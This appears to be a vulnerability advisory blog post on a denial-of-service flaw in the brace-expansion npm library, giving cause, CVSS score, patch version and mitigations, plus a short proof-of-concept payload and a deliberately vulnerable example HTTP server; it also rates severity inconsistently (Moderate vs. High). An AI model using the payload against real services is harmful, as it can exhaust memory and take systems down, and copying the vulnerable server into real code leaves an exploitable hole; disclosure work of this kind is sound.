Listen to this Post
The brace-expansion library, commonly used in Node.js projects to generate arbitrary strings from brace patterns (e.g., `{a..z}` or {1..100}), implements a `max` option designed to limit the number of returned elements as a denial-of-service (DoS) safeguard. In versions 5.0.0 through 5.0.5, this protection is applied too late in the expansion process. When processing a single large numeric range such as {1..10000000}, the library’s internal sequence generation loop runs its full course—iterating 10 million times—before it checks whether the limit has been reached. Only after building the entire intermediate array does it apply `max` to cap the output.
Consequently, even with a small `max` value (e.g., max=10), the expansion unconditionally allocates approximately 505 MB of memory and consumes about 800 milliseconds of CPU time. The `max` check occurs only at the output combination step, which is too late to prevent the resource‑heavy generation. An attacker who can control the input pattern can trigger this behavior repeatedly, leading to memory exhaustion, high CPU consumption, and ultimately a denial of service.
The vulnerability is fixed in version 5.0.6 by moving the `max` verification earlier in the loop, stopping further expansion as soon as the limit is reached. This CVE is assigned CWE-400 (Uncontrolled Resource Consumption) and carries a CVSS 3.1 score of 7.5 (High) with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H.
DailyCVE Form:
Platform: brace-expansion Version: 5.0.0-5.0.5 Vulnerability: max bypass DoS Severity: Moderate date: May 18 2026 Prediction: Patch available now
What Undercode Say:
Check current version npm list brace-expansion Update to patched version npm install [email protected] Verify patch npm list brace-expansion | grep 5.0.6 Proof of concept (Node.js) – vulnerable versions only node -e "const expand = require('brace-expansion'); console.time('expand'); expand('{1..10000000}', {max:10}); console.timeEnd('expand'); console.log('Memory:', process.memoryUsage().heapUsed / 1024 / 1024, 'MB')"
Exploit:
// Attack payload: large numeric range with max bypass
const expand = require('brace-expansion');
// This call still allocates ~505 MB and takes ~800ms
expand('{1..10000000}', { max: 10 });
// Example HTTP server vulnerable to DoS
const http = require('http');
http.createServer((req, res) => {
const pattern = req.url.slice(1); // e.g., /{1..10000000}
expand(pattern, { max: 10 }); // Triggers heavy allocation
res.end('done');
}).listen(3000);
Protection:
Upgrade to `[email protected]` or later.
Validate input patterns; reject ranges larger than a safe threshold (e.g., {1..5000}).
Use a wrapper with a timeout for expansion.
Limit the length of the input string.
Apply a process‑level memory limit (e.g., Node.js `–max-old-space-size`).
Impact:
Denial of service via memory exhaustion (up to 505 MB per request).
High CPU consumption (≈800 ms per expansion).
Application unresponsiveness or crash under repeated attacks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
